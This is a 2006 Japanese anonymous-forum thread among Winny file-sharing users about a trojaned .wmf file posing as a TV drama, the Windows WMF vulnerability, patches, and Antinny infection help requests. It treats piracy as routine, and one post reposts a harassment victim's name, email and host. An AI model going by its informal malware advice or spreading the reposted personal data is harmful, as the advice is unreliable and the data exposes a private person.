[ドラマ] 新春ドラマSP 古畑任三郎ファイナル 02 「フェアな殺人者」 (640x480 DivX521).avi .wmf NOBOXP62kb 13,082 031249961b7854e0791aa59e5c1b4ae4

856 :[名無し]さん(bin+cue).rar:2006/01/04(水) 21:36:33 ID:nxAc853Q0
>>855
何この、wmf ファイルwww

857 :[名無し]さん(bin+cue).rar:2006/01/04(水) 21:37:31 ID:aQHa03Po0
もう流れてるの?w

858 :[名無し]さん(bin+cue).rar:2006/01/04(水) 21:42:31 ID:muZeMTC20
NOBOXP62kbは黙って無視だなw

859 :[名無し]さん(bin+cue).rar:2006/01/04(水) 22:10:21 ID:Vv4NIjj10
いや、ところがねー

[ドラマ] 古畑任三郎ファイナル 第1夜 「今、甦る死」 Guest:石坂浩二 藤原竜也 (2006.01.03 704x396 DivX511).avi XooPZMvFic 772,842,738 8beff5b5beb6f205a40ef65affc12bfe

これ本物だったんだけど、
これと同じトリップで.avi    .wmfがあったんだよ。
同じ人がウイルスと本物ながすことあんのかな?

860 :[名無し]さん(bin+cue).rar:2006/01/04(水) 22:12:45 ID:Y3QrPVq+0
ウイルス付けた奴が元のトリップ付け直して再放流したんじゃ?

861 :[名無し]さん(bin+cue).rar:2006/01/04(水) 22:13:29 ID:oc0K6uUO0
>>859
鳥偽装なんて珍しくないじゃん

862 :[名無し]さん(bin+cue).rar:2006/01/04(水) 22:18:18 ID:Vv4NIjj10
鳥ってそんなに簡単に偽装できるものなんだ。
くわしくなくてゴメンね。
なるほどわかりました。

863 :[名無し]さん(bin+cue).rar:2006/01/04(水) 22:27:27 ID:shGOhHms0
第1夜は本物を流して安心させて
第2夜でハメるというのはよくある手。
神を疑いたくはないが、すべてを疑ってかからないと@西園寺

864 :[名無し]さん(bin+cue).rar:2006/01/04(水) 22:29:58 ID:yElFR2+R0
青字だよ

865 :[名無し]さん(bin+cue).rar:2006/01/04(水) 22:30:05 ID:bOlRoTVH0
それ踏んだらどうなんだろ。気になるわ

866 :[名無し]さん(bin+cue).rar:2006/01/04(水) 22:31:32 ID:xqwrRLDF0
>>863
職人様がそんなことするはずないじゃないか〜   by今泉

867 :[名無し]さん(bin+cue).rar:2006/01/04(水) 22:37:24 ID:yElFR2+R0
>世界のコンピュータのうち99%までがこの攻撃に対して脆弱である

868 :[名無し]さん(bin+cue).rar:2006/01/04(水) 22:44:28 ID:ixoT4fJP0
wmfってフォルダを開いただけで発動なんですよね・・・


http://ringonoki.net/tool/filer/1-filer.html
ここにあるソフト使って見るなら発動しない??

869 :[名無し]さん(bin+cue).rar:2006/01/04(水) 23:34:38 ID:pNsbYgai0
>>510
うわぁぁぁぁぁぁぁぁぁぁぁぁぁぁぁぁぁぁぁぁぁぁぁぁぁぁぁぁぁぁぁぁぁ!!!!!!!!

870 :[名無し]さん(bin+cue).rar:2006/01/04(水) 23:47:33 ID:xUb5bO7d0
>>868
物&設定によって違ってくるでしょ。

871 :[名無し]さん(bin+cue).rar:2006/01/05(木) 02:02:46 ID:hCqdUsKa0
アスロン最強伝説・・。AMD!!AMD!!

872 :[名無し]さん(bin+cue).rar:2006/01/05(木) 03:17:09 ID:Olv2iVMz0
【使用OS】 winXP SP2
【WindowsUpdateしてるか】 自動更新通知が来た時
【使用AntiVirusソフト】 avast!
【AntiVirusをUpdateしてるか】 自動更新
【ウイルススキャンの結果】 一つ発見
【オンラインスキャンしたなら結果】 ウイルスタイプ:Trojan 別名:W32.HLLW.Antinny, W32/Antinny.worm.r
【Winnyのバージョン】 share使用
【Winny歴、総DL量】 8ヶ月 
【テンプレを読んだか】 はい
【テンプレにある対策を実行したか】 まだ
【症状、具体的に分かる限りすべて書く】 ふとupフォルダを覗いてみたらデスクトップの画像が数百あった。
【似非キンタマ】desktop live!0.1.0
【何をしたらそんなことになったのか】 多分mp3ファイルを開いた時ではないかと・・。クリックしても音楽が流れなくて。
【これまでにとった措置】 とりあえずupフォルダにあったjpgファイル(隠しファイルも含めて)全消去。だけ

>>7にある事を確認しようと調べましたが、どれも確認できませんでした。
どうかご教授お願いします

873 :[名無し]さん(bin+cue).rar:2006/01/05(木) 03:21:44 ID:CZOXbMcT0
>>872
> 【Winnyのバージョン】 share使用

この時点で、このスレに出入りできる立場ではないと思うが…
今、ゲイツあけましておめでとう、で忙しい時期なのに。

874 :[名無し]さん(bin+cue).rar:2006/01/05(木) 03:51:14 ID:nvQt3Tln0
whiter対策見て思ったんだけどさ、
キンタマ対策もnyフォルダにupfoler.txtってフォルダを作ればいいだけなんじゃないか?

875 :[名無し]さん(bin+cue).rar:2006/01/05(木) 04:00:36 ID:Xb28g/5g0
>>874
実際読み込むファイル名だから動作不良起こしそうだけど…試したの?

876 :[名無し]さん(bin+cue).rar:2006/01/05(木) 04:11:36 ID:nvQt3Tln0
ファイルをうpしたい時は、
テキストとフォルダをリネームする→目的のファイルをキャッシュ化したらまた戻す
みたいな感じですればファイルのうpもできると思うんだよね
これを自動化してくれるツールがあれば便利だし

>>875
たぶん大丈夫だと思う
自分の環境ではどうも無かったし

877 :[名無し]さん(bin+cue).rar:2006/01/05(木) 04:19:36 ID:Xb28g/5g0
じゃ起動時は大雑把な存在確認だけなのかね、動作に問題なければ有効かも
必要なとき移動すればいいんでツールで自動化するほどのこともないかと

878 :[名無し]さん(bin+cue).rar:2006/01/05(木) 04:20:35 ID:hCqdUsKa0
ていうか普通に普段UPフォルダに何か入れてUPしてる奴は既にあるはずじゃね

879 :[名無し]さん(bin+cue).rar:2006/01/05(木) 04:30:34 ID:Xb28g/5g0
UPフォルダを使えなくなるという欠点は大きいか、微妙だね

880 :[名無し]さん(bin+cue).rar:2006/01/05(木) 04:43:57 ID:nvQt3Tln0
あぁ、だめだ
UpFolder.txtってフォルダがあってテキストが無くても
何故かフォルダ登録できるしキャッシュ化もしてる('A`)

881 :[名無し]さん(bin+cue).rar:2006/01/05(木) 06:50:38 ID:s4HDXm+V0
そろそろ記事が出る頃だな>新種ウィルス


882 :[名無し]さん(bin+cue).rar:2006/01/05(木) 07:18:52 ID:3OeKUcSl0
「事態はますます悪化」――Windows脆弱性の悪用広がる
http://www.itmedia.co.jp/enterprise/articles/0601/04/news011.html

883 :[名無し]さん(bin+cue).rar:2006/01/05(木) 07:43:43 ID:fGmQjbq20
理化学研究所 
http://qb5.2ch.net/test/read.cgi/saku2ch/1136391649/1

1 名前:太田摩耶[mayan@pc.clubbbq.com] 投稿日:06/01/05 01:20 HOST:softbank218128120139.bbtec.net
対象区分:[法人/団体]管理人裁定待ち
削除対象アドレス:
http://ex13.2ch.net/test/read.cgi/neet4vip/1136383254/
http://food6.2ch.net/test/read.cgi/nissin/1136383487/
http://science4.2ch.net/test/read.cgi/rikei/1136276078/
http://news18.2ch.net/test/read.cgi/scienceplus/1136158032/
http://science4.2ch.net/test/read.cgi/life/1104716119/
http://news18.2ch.net/test/read.cgi/scienceplus/1135351319/
http://science4.2ch.net/test/read.cgi/bake/1096367476/
http://news18.2ch.net/test/read.cgi/scienceplus/1134477752/
http://news18.2ch.net/test/read.cgi/scienceplus/1126775656/
http://science4.2ch.net/test/read.cgi/bake/1096367911/
http://news18.2ch.net/test/read.cgi/scienceplus/1135660888/
http://science4.2ch.net/test/read.cgi/life/1023857444/
削除理由・詳細・その他:
ご迷惑をおかけいたします。
掲示板で名前、職場、住所、写真を公開されてしまっている本人です。
私自身に問題があり、深く深く反省しておりますが、職場に迷惑をかけることは
なんとしてでも防ぎたいと強く思っています。
スレッドごとの削除をお願いできないでしょうか?
すでに私自身の元には被害がありまして対応しきれなくなり、警察にも明日相談しようかと考えています。
どうかよろしくお願いいたします。
対応していただきますよう、重ねてお願い申し上げます。

助けてください。

884 :[名無し]さん(bin+cue).rar:2006/01/05(木) 08:14:07 ID:3OeKUcSl0
仁義スレのやつら最近ひど杉

885 :[名無し]さん(bin+cue).rar:2006/01/05(木) 08:27:07 ID:mRFAFLig0
スレタイ通り、仁義なんかあったもんじゃないなw

886 :[名無し]さん(bin+cue).rar:2006/01/05(木) 08:46:28 ID:IwWdNBnc0
>>884
犯罪者乙。

887 :[名無し]さん(bin+cue).rar:2006/01/05(木) 08:49:39 ID:kHrx63Zu0
みんなもきをつけよーねー(^o^)/

888 :[名無し]さん(bin+cue).rar:2006/01/05(木) 08:51:33 ID:3OeKUcSl0
>>886
   〃∩ ∧_∧
   ⊂⌒(  -ω-)  はいはいわろすわろす
     `ヽ_っ⌒/⌒c     
        ⌒ ⌒


889 :[名無し]さん(bin+cue).rar:2006/01/05(木) 08:57:12 ID:gJbbXYFU0
>>780
言論の自由でないの?

890 :[名無し]さん(bin+cue).rar:2006/01/05(木) 09:09:08 ID:LFdJ3hoy0
2chのたった一つのスレに匿名の誰かが書き込んだだけの戯言をイチイチ訴えたら
そのとき、MSがいかに痛い企業か判明するんだろうけど
まずそんなことはないと思った粉雪の降る朝。

891 :[名無し]さん(bin+cue).rar:2006/01/05(木) 09:23:58 ID:jhCIhDiQ0
ゲイツよりディズニーのほうが怖いわ

892 :[名無し]さん(bin+cue).rar:2006/01/05(木) 09:26:19 ID:lRc6xzY/0
やつらはネラーに痛いと思われてもぜんぜん気にしないだろ

893 :[名無し]さん(bin+cue).rar:2006/01/05(木) 10:35:37 ID:GZIvagIF0
インテルのBIOSのウィルス対策、Execute Disable Bitって効果あるの?

894 :[名無し]さん(bin+cue).rar:2006/01/05(木) 11:17:09 ID:esOettDs0
某エロサイトでさっそくwmfの拡張子のファイルが仕込まれた模様。
ノートン先生がはりきって削除してくれたのはいいけど海外の人仕事早すぎwwwwwww

895 :[名無し]さん(bin+cue).rar:2006/01/05(木) 11:22:31 ID:3OeKUcSl0
日本のサイトにももう貼られてる
>>882


896 :[名無し]さん(bin+cue).rar:2006/01/05(木) 11:29:18 ID:Ql+nCz0h0
10日って遅すぎだろ
変態じゃないの?

897 :[名無し]さん(bin+cue).rar:2006/01/05(木) 11:30:05 ID:UTcmZj9+0
たいした被害でねぇなぁ。つまんね。お前らもッとがんばれよ

898 :[名無し]さん(bin+cue).rar:2006/01/05(木) 13:01:53 ID:ZQ/+z12C0
>>889
自由ってのはルールを守った上での事な
自由と勝手は違うぞ

899 :[名無し]さん(bin+cue).rar:2006/01/05(木) 14:09:53 ID:WsqzscLC0
WMF脆弱性に2つめの非公式パッチ公開、「新たなリスクを生む」との議論も
http://www.itmedia.co.jp/enterprise/articles/0601/05/news028.html

900 :[名無し]さん(bin+cue).rar:2006/01/05(木) 14:55:53 ID:ggB2lbXO0
900なら今日中に緊急パッチ

901 :[名無し]さん(bin+cue).rar:2006/01/05(木) 14:59:59 ID:m/9Sm3LF0
       \
 お そ .い ヽ
 か の や  |
 し  理  `  ,. -──- 、
 い .屈   /   /⌒ i'⌒iヽ、
    は /   ,.-'ゝ__,.・・_ノ-、ヽ
      i ‐'''ナ''ー-- ● =''''''リ      _,....:-‐‐‐-.、
      l -‐i''''~ニ-‐,....!....、ー`ナ      `r'=、-、、:::::::ヽr_
 ̄ \ヽー' !. t´ r''"´、_,::、::::} ノ`     ,.i'・ ,!_`,!::::::::::::ヽ >>898
    ヾ、 ゝゝ、,,ニ=====ニ/r'⌒;    rー`ー' ,! リ::::::::::::ノ
       i`''''y--- (,iテ‐,'i~´,ゝ'´     ̄ ̄ヽ` :::::::::::ノ
       .|  !、,............, i }'´    _   、ー_',,...`::::ィ'
     ●、_!,ヽ-r⌒i-、ノ-''‐、    ゝ`ーt---''ヽ'''''''|`ーt-'つ
        (  `ーイ  ゙i  丿   ;'-,' ,ノー''''{`'    !゙ヽノ ,ヽ,
        `ー--' --'` ̄       `ー't,´`ヽ;;;、,,,,,,___,) ヽ'-゙'"
                       (`ー':;;;;;;;;;;;;;;;ノ
                       ``''''''``'''''´  

902 :[名無し]さん(bin+cue).rar:2006/01/05(木) 15:49:17 ID:EK3NQprh0
>>901 ← 自分勝手界のオーソリティ


903 :[名無し]さん(bin+cue).rar:2006/01/05(木) 15:56:47 ID:CZ03ZIKl0
>世界のコンピュータのうち99%までがこの攻撃に対して脆弱である

904 :[名無し]さん(bin+cue).rar:2006/01/05(木) 16:03:39 ID:N4EKfP0A0
すげー嘘だなw
そもそもMSのシェアがそこまで独占状態じゃないだろ

905 :[名無し]さん(bin+cue).rar:2006/01/05(木) 16:06:15 ID:UTcmZj9+0
ルールってなにゃねん

906 :[名無し]さん(bin+cue).rar:2006/01/05(木) 16:12:21 ID:rT8SO2oE0
うちのMACちゃんは大丈夫ですか?^^;

907 :[名無し]さん(bin+cue).rar:2006/01/05(木) 16:13:18 ID:3bQmSRqk0
MSは自分の所のパッチを当てろって言うなら
10日なんて言ってないでさっさと出せよw

908 :[名無し]さん(bin+cue).rar:2006/01/05(木) 16:32:10 ID:m+HVYeeM0
>>906
MACはPCではない

909 :[名無し]さん(bin+cue).rar:2006/01/05(木) 16:35:46 ID:yrCYON+B0
>>907
MSなら非公式パッチ当てた環境では再起動中に止まって二度と起動しないようしてくれるに違いない

910 :[名無し]さん(bin+cue).rar:2006/01/05(木) 16:41:21 ID:dAsa0l2u0
>>909
やりかねん…

911 :[名無し]さん(bin+cue).rar:2006/01/05(木) 16:44:50 ID:tBsJkW1T0
ファイルの正当性チェックに引っかかって更新が出来ないってのなら
普通にありそうだけどな。
そもそもパッチ当てた状態でアップデートする馬鹿はいないだろうがw

912 :[名無し]さん(bin+cue).rar:2006/01/05(木) 17:11:37 ID:sTK5F0L40
MACはPCじゃないって誰が言い出したの?
全く意味が分からないんだけど。

913 :[名無し]さん(bin+cue).rar:2006/01/05(木) 17:14:06 ID:dAsa0l2u0
Macはパーソナルコンピュータではあるけど
IBM-PC互換機の通称としてのPCではないな

914 :[名無し]さん(bin+cue).rar:2006/01/05(木) 17:15:30 ID:EK3NQprh0
908の崇高なギャグについてこれない方がいらっしゃる様子

915 :[名無し]さん(bin+cue).rar:2006/01/05(木) 17:20:21 ID:dAsa0l2u0
崇高ではないな

916 :[名無し]さん(bin+cue).rar:2006/01/05(木) 17:20:31 ID:VrWrecHN0
ギャグじゃないだろう
MAC使ってる奴に、「お前のPC」っていうと、「PCじゃねえよ」と言われる
特に2ch上では

917 :[名無し]さん(bin+cue).rar:2006/01/05(木) 17:22:55 ID:3OeKUcSl0
35:オレオレ!オレだよ、名無しだよ!! :2006/01/05(木) 01:59:56 0
BREAKING NEWS!
Microsoft's OFFICIAL SECURITY UPDATE leaked
onto the Internet early (and it works great!)
http://www.grc.com/sn/notes-020.htm

これによると非公式パッチをインストールしたままMSのセキュリティ
アップデート(公式パッチを含む)をインストールしても大丈夫みたい。

918 :[名無し]さん(bin+cue).rar:2006/01/05(木) 17:25:18 ID:gwnrJtpm0
>>899
ダウンロードしたけど、zip の中に Install.exe がぽつんと1つだけしか存在しない。
readme くらい入れとけよ。。。>ESET

最初に出てきた hexblog の非公式パッチにはソースコードがついていたから安心できるけど、
ESET のパッチは怖いなぁ。まさか、GDI32.DLL を直接置き換えたりしないよねぇ

hexblog の方は、DLL インジェクション+強制メモリパッチでやっているから、
GDI32.DLL ファイルへの変更はないけど、ESET はどんな方法を使っているんだろうか。。。

919 :[名無し]さん(bin+cue).rar:2006/01/05(木) 17:25:50 ID:H3lj4kDK0
26Mほどのsusieで表示されないbmpファイル拾ったけど、これが噂のウイルスですかね?

920 :[名無し]さん(bin+cue).rar:2006/01/05(木) 18:17:33 ID:VEyj1BYa0
>>919
ハッシュは?

921 :[名無し]さん(bin+cue).rar:2006/01/05(木) 19:25:11 ID:3OeKUcSl0
MSパッチの配布が10日って米国時間だよな?
日本は11日だよな?

922 :[名無し]さん(bin+cue).rar:2006/01/05(木) 19:36:19 ID:CZOXbMcT0
>>919
わかんね、ウイルスコードにしてはでかすぎr
>>921
日本では11日。定例の第二水曜日

923 :[名無し]さん(bin+cue).rar:2006/01/05(木) 19:48:42 ID:3OeKUcSl0
>>922
thanks あぶね〜

924 :[名無し]さん(bin+cue).rar:2006/01/05(木) 21:51:49 ID:4kBDNUzk0
  ( ⌒ )
   l | /
  〆⌒ヽ
⊂(#・∀・)   なにも進展してねーじゃねーかっ!!
 /   ノ∪
 し―-J |l| |
         人ペシッ!!
      (_)
     )(__)(_
    ⌒)   (⌒
      ⌒Y⌒

925 :[名無し]さん(bin+cue).rar:2006/01/05(木) 22:15:43 ID:2+8j4UFX0
wmfのやつは一日経っても変化無しか

926 :[名無し]さん(bin+cue).rar :2006/01/05(木) 23:57:02 ID:85PoPZn00
【使用OS】 xp home edition
【WindowsUpdateしてるか】 しています
【使用AntiVirusソフト】 AVG Anti-Virus free edition
【AntiVirusをUpdateしてるか】 自動ですがしています
【ウイルススキャンの結果】 通常は無反応ですが、現在2度ほどCドライブのSystem Volume Infomation\_restoreよりAntinny.AFに
感染?したファイルが発見され使用AntiVirusソフトにより削除されます。
また1回ですがC:\Documents and Settings\All Users\Application Data\avg7Date\$UGP.AVGからも同様にAntinny.AF
による感染?ファイルが発見され削除されています

【オンラインスキャンしたなら結果】 バスターおよびシマンティクのオンラインスキャンでは反応なし
【Winnyのバージョン】
【Winny歴、総DL量】 2年弱。DL量は不明
【テンプレを読んだか】 はい
【テンプレにある対策を実行したか】 再インスト以外はしてます
【症状、具体的に分かる限りすべて書く】 具体的な症状はありません。スキャンした結果、C¥System Volume Infomation\_restoreよりAntinny.AFが
検出されます。オンラインスキャンでは無反応。
【何をしたらそんなことになったのか】
ZIPファイルをWinrarにて解凍したためとおもわれます。
偽装したexeが同梱でしたがRARでの解凍以外は実行(ダブルクリック)していません。
偽装exeファイルは削除しました。

927 :[名無し]さん(bin+cue).rar :2006/01/05(木) 23:58:42 ID:85PoPZn00
926続き
オンラインスキャンしたなら結果】 バスターおよびシマンティクのオンラインスキャンでは反応なし
【Winnyのバージョン】
【Winny歴、総DL量】 2年弱。DL量は不明
【テンプレを読んだか】 はい
【テンプレにある対策を実行したか】 再インスト以外はしてます
【症状、具体的に分かる限りすべて書く】 具体的な症状はありません。スキャンした結果、C¥System Volume Infomation\_restoreよりAntinny.AFが
検出されます。オンラインスキャンでは無反応。
【何をしたらそんなことになったのか】
ZIPファイルをWinrarにて解凍したためとおもわれます。
偽装したexeが同梱でしたがRARでの解凍以外は実行(ダブルクリック)していません。
偽装exeファイルは右クリックで削除しました。

【これまでにとった措置】
レジストリを確認しました。HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 等
怪しいものsvchost.exeなどはありませんでした。
まとめサイトで確認した【欄検眼段】についてHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run に
IMJPMlG.exeが作成されるとありましたが
値の名前imjpmig 値のデータC:\Program Files\Common Files\Microsoft Shared\IME\IMJP\imjpmig.exe /RemAdvDef /AIMEREG /Migration /SetPreload
また
値の名前IMJPMIG 値のデータ"C:\WINDOWS\IME\imjp8_1\IMJPMIG.EXE" /Spoil /RemAdvDef /Migration32
というのがありましたが関係ありますでしょうか?
C:\WINDOWS\system32\IMJPMlG.exeは作成作成されてないとおもいます。
Antinny.AFを検索してみましたが英語表記のバスターのサイトしかみつかりませんでした。
また、症状にあるレジストリ改変もないようにおもいます。

よろしくお願いします。

928 :[名無し]さん(bin+cue).rar:2006/01/06(金) 00:01:32 ID:Q0Ldvw4A0
>>926
>【使用OS】 xp home edition

Windows updateしてないの?
駄目じゃん

929 :[名無し]さん(bin+cue).rar:2006/01/06(金) 00:02:16 ID:qbCmJx8V0
>>927
再インスト推奨。

930 :[名無し]さん(bin+cue).rar:2006/01/06(金) 00:03:33 ID:NneFqSXK0
>【WindowsUpdateしてるか】 しています

SP1もSP2も入れてないのに?


931 :[名無し]さん(bin+cue).rar:2006/01/06(金) 00:23:57 ID:6wT12/Q00
マウントしたCDの中に
install.exeとautorunが突っ込んであって
install.exeを実行するようになってた
お陰でny2のフォルダの中身が全部無くなりました
どうやらny2アンインスコCDだったようです

932 :[名無し]さん(bin+cue).rar:2006/01/06(金) 00:27:14 ID:X/wHcL+G0
>928,930
すいません
Updateはしています。
現在はSp2です。
感染してますでしょうか?

933 :[名無し]さん(bin+cue).rar:2006/01/06(金) 00:39:25 ID:KECsfklW0
>>926
とりあえずシステムの復元ポイントを全削除してからもう一度スキャンしてみ

934 :[名無し]さん(bin+cue).rar:2006/01/06(金) 00:39:28 ID:OArJwgEa0
>>931
卒業おめでとう

>>932
再インスコ推奨

935 :[名無し]さん(bin+cue).rar:2006/01/06(金) 00:41:54 ID:MC1AqMKI0
今日のシャッフルまじすげええええwwwwwwww
鯖飛びまくりwwwwwwwwwwwwwwwwwwwwwwwwwwwww




936 :[名無し]さん(bin+cue).rar:2006/01/06(金) 00:47:28 ID:eYdb6+QO0
はいはいkwskkwsk

937 :[名無し]さん(bin+cue).rar:2006/01/06(金) 00:54:17 ID:X/wHcL+G0
>>933
やってみます。
現在はシステムの復元を無効にするにチェックを入れた状態で
スキャンし、
AVG Anti-Virus free edition
及び、バスターオンラインでは
ウイルス検出されませんでした。

ちなみにexeを実行しなくてもRAR等で解凍するだけで
ANTINNY.AFに感染というのはありうるのでしょうか?
逆に、感染していないとして、C¥System Volume Infomation\_restoreから検出されるものでしょうか?
C:\Documents and Settings\All Users\Application Data\avg7Date\$UGP.AVGからの検出は問題ないでしょうか?

>>933
再インスコは最終手段として
なにか確認手段等ご教授ねがえませんでしょうか?

938 :[名無し]さん(bin+cue).rar:2006/01/06(金) 00:59:57 ID:+dFb2uKY0
有り得ないことはないけど、あまりない。具体的にどう被害があったとかじゃないと判断は難しいね。
単にアンチウィルスの中の人が「ウィルスっぽさ」で過剰反応しているだけかもしれんから。
(掲示板のログとかがウィルスだって誤診されるみたいに)

939 :[名無し]さん(bin+cue).rar:2006/01/06(金) 01:14:55 ID:PxJ2dXbj0
>>937
爆弾抱えたままネットを徘徊できる度胸があれば
今のままで全然構いませんよ

940 :[名無し]さん(bin+cue).rar:2006/01/06(金) 01:27:52 ID:X/wHcL+G0
>>939
おっしゃるとおりですね・・・



しかし、ANTINNY.AFってのは
googleで検索してみると
英語表記のものはあるのですが、
トレンドマイクロのウイルスデータベースで直接
検索してもなぜみつからないのでしょうか?


941 :[名無し]さん(bin+cue).rar:2006/01/06(金) 01:39:46 ID:rM4hVFbm0
>>940
比較的新しく発見されたウイルスは駆除方法が確立されてないからだとおもわれ
俺もこの前ニュイルスをトレンドマイクロにおくったがいまだにデータベースに載らない

現在 「WORM_ANTINNY.AQ」 の情報公開にむけ、準備を行っております。
情報が公開され次第改めてご連絡いたしますので、今しばらくお待ちいただきますよう、
お願いいたします

トレンドマイクロからこんなメールがきた


942 :名無し]さん(bin+cue).rar:2006/01/06(金) 01:49:03 ID:X/wHcL+G0
>>941
トレンドマクロの英語表記サイトでは
最初のパターンファイルリリース日: 2005/04/07 5:00:00
となっているのですが・・・
普通にデータベースで検索してもなぜかひっかからないです・・・


943 :[名無し]さん(bin+cue).rar:2006/01/06(金) 01:54:01 ID:x5AXUZXm0
単に未登録なんじゃね

944 :[名無し]さん(bin+cue).rar:2006/01/06(金) 01:57:33 ID:KrAXl55j0
>>942
exe意外になんか入ってなかった?

945 :[名無し]さん(bin+cue).rar:2006/01/06(金) 01:58:32 ID:AjSzp7qV0
C¥System Volume Infomation\_restoreは復元ポイントを削除すればいいだけ
C:\Documents and Settings\All Users\Application Data\avg7Date\$UGP.AVGはAVGのアップデータか何かでは

過去に感染した可能性があるが誤報のような気がする
クリーンインスコが一番安心できると思うがね

946 :名無し]さん(bin+cue).rar:2006/01/06(金) 02:32:32 ID:X/wHcL+G0
>>944
zipの中にexeとjpegがあり、exeが存在する状態では
バスターのオンラインスキャンでもウイルス検出できましたが、
RARで解凍したのちexe取り除いたものをスキャンしたら
ウイルスは検出されなくなりました。

ちなみに
RARで解凍中、CRCが一致しませんといった様なメッセージでたような気がします・・

>>945
resutore{文字の羅列}てな感じです。

うーん感染してるのだろうか。。。

947 :[名無し]さん(bin+cue).rar:2006/01/06(金) 02:49:21 ID:Gxt5leUx0
>>946
もしかしたら、exeを実行するようにjpeg(WMF脆弱穴)で仕込んでたのかも
知れない。WMF穴を突付くものには、バスターやら先生が未識別のものも出回ってる。

そんなにクリーンインスコを嫌うのが分からん。何されてるか分からん以上は
それしか安心を得るにはない。また、既に流れたものは取り返しが付かない。
各種パスやらなんやら、できるだけ変えるしかないねぇ。

948 :[名無し]さん(bin+cue).rar:2006/01/06(金) 02:56:03 ID:gtTRugzC0
そんな時はトゥルゥイメェ〜ジ使っちゃえヨ。あ、もう遅いかw

949 :[名無し]さん(bin+cue).rar:2006/01/06(金) 03:40:16 ID:POWn+mRh0
解凍する前にウィルススキャンする癖身に付けんとまたなるよ

950 :[名無し]さん(bin+cue).rar:2006/01/06(金) 03:57:38 ID:x5AXUZXm0
そもそも解凍するなという話だが

951 :[名無し]さん(bin+cue).rar:2006/01/06(金) 05:05:16 ID:r0/QLW0s0
>>950
オレexeとかvixのカタログファイルとか余計な物が入ってた場合、
解凍して余計なファイル処分して圧縮し直してるんだけど。
解凍せずに圧縮ファイルの中を編集とかできたりする?

952 :[名無し]さん(bin+cue).rar:2006/01/06(金) 05:07:06 ID:0eokfsAU0
>>951
んなもん書庫ごと捨ててしまえw

953 :[名無し]さん(bin+cue).rar:2006/01/06(金) 05:11:15 ID:v9d+DmMV0
>>951
俺もまったく同じ事してる
アンチウィルスソフトが書庫ごと消去しちゃうんだよな

954 :[名無し]さん(bin+cue).rar:2006/01/06(金) 05:19:12 ID:IV/PsItA0
>>951
できる。

955 :[名無し]さん(bin+cue).rar:2006/01/06(金) 05:32:33 ID:v9d+DmMV0
いや普通に考えて無理じゃね?

956 :[名無し]さん(bin+cue).rar:2006/01/06(金) 05:33:02 ID:lSQp/daF0
lzhやzipファイルならLhazで閲覧→削除は可能

avast!ならクイックスキャンでウィルスのファイルのみ削除可能

957 :[名無し]さん(bin+cue).rar:2006/01/06(金) 05:33:07 ID:D8xEMzeB0
ttp://www.exconn.net/Blogs/team02/archive/2006/01/06/6078.aspx

958 :[名無し]さん(bin+cue).rar:2006/01/06(金) 05:45:22 ID:E1Fe9frX0
>>951,953
お薦めします。↓
http://a-t-software.hp.infoseek.co.jp/apps/delexe/
インターフェイスはごちゃごちゃしててイヤだけど、便利だよ。

959 :[名無し]さん(bin+cue).rar:2006/01/06(金) 05:59:05 ID:fHNKTUjV0
MSの緊急パッチ来たね。

>Windows XP 用セキュリティ更新プログラム (KB912919) 2006年1月6日
>Microsoft Windows ベースのシステムを攻撃者が侵害できるセキュリティ問題が発見されました。
>この更新プログラムをインストールすると、お使いのコンピュータを保護できます。
>ttp://www.microsoft.com/japan/technet/security/bulletin/ms06-001.mspx
>Graphics Rendering Engine の脆弱性によりコードが実行される可能性がある

960 :[名無し]さん(bin+cue).rar:2006/01/06(金) 06:07:38 ID:JiDZKoDd0
>>959
マイクロソフト社は定例アップデート諦めちまったのかな?

961 :[名無し]さん(bin+cue).rar:2006/01/06(金) 06:14:41 ID:smq7XCo30
ZIPを開いて、exeとかをゴミ箱の上にD&Dすりゃいいじゃん

962 :[名無し]さん(bin+cue).rar:2006/01/06(金) 06:15:28 ID:OWpsuFIF0
やっぱり、10日に公開は長すぎて危険って判断したのかな。
やっと、画像掲示板を巡回出来るぜ。


ところで、DEF有効にしても
今まで反応したのが、HAKOBAKOだけなんだけど
大丈夫なのか。
MSパッチ入れた後でも、DEF有効のままにした方がいいのかな?
DEF有効にしてると、重くなるだとか何か問題ある?

963 :[名無し]さん(bin+cue).rar:2006/01/06(金) 06:20:57 ID:HAgfDSAA0
>>959
このパッチあてたら登録解除してたShimgvw.dllを再登録してもいいの?

964 :[名無し]さん(bin+cue).rar:2006/01/06(金) 06:31:00 ID:JiDZKoDd0
ウイルスバスターですらスルーしていたウイルス画像をパッチ適用したら回避成功
(゚Д゚)ウマー

965 :[名無し]さん(bin+cue).rar:2006/01/06(金) 06:43:12 ID:CR+ESsq70
>>963
多分問題ないと思うけど、良い機会だから他のビューアに乗り換えたら

966 :[名無し]さん(bin+cue).rar:2006/01/06(金) 06:49:07 ID:CJ33C53W0
でも正直VixとかよりもFaxビュアーの方が使い勝手も画質も好き

967 :[名無し]さん(bin+cue).rar:2006/01/06(金) 06:49:19 ID:r0/QLW0s0
>>958
ありがとうございます、試してみます。
>>959
WindowsUpdateからでもできるらしいのだがここ最近WindowsUpdateに繋がらない、なんでだ?
まあ>>959のリンク先でダウンロードしてきて実行できたから良かった。

968 :[名無し]さん(bin+cue).rar:2006/01/06(金) 06:57:43 ID:546OYiL70
MS06-001
新年一発目

今年は3桁目まで使うのかな?

969 :[名無し]さん(bin+cue).rar:2006/01/06(金) 07:00:19 ID:JiDZKoDd0
>>967
port443閉じてない?

970 :[名無し]さん(bin+cue).rar:2006/01/06(金) 07:12:52 ID:r0/QLW0s0
>>969
閉じてないと思います。
少し前まではWindowsUpdateに繋がってましたから。

971 :[名無し]さん(bin+cue).rar:2006/01/06(金) 07:21:56 ID:GAjbLlNC0
Microsoftの修正パッチがリリース前に流出,「無視してほしい」
ttp://itpro.nikkeibp.co.jp/article/NEWS/20060105/226927/



終了

972 :[名無し]さん(bin+cue).rar:2006/01/06(金) 07:23:29 ID:bS+zWLYD0
( ´_ゝ`)フーン

973 :[名無し]さん(bin+cue).rar:2006/01/06(金) 07:24:07 ID:m85hYd1i0
http://www.exconn.net/blogs/default.aspx



再開

974 :[名無し]さん(bin+cue).rar:2006/01/06(金) 07:25:39 ID:b5eXW9XG0
>>966
ちょっとプレビューしようとするとfaxびゅわ便利なんだよね

975 :[名無し]さん(bin+cue).rar:2006/01/06(金) 07:29:05 ID:Gxt5leUx0
先生更新。手元にあるWMF脆弱性を突付くブツに関して
先ほどまでは、亜種らしきものはスルーだったのが反応するようになった。
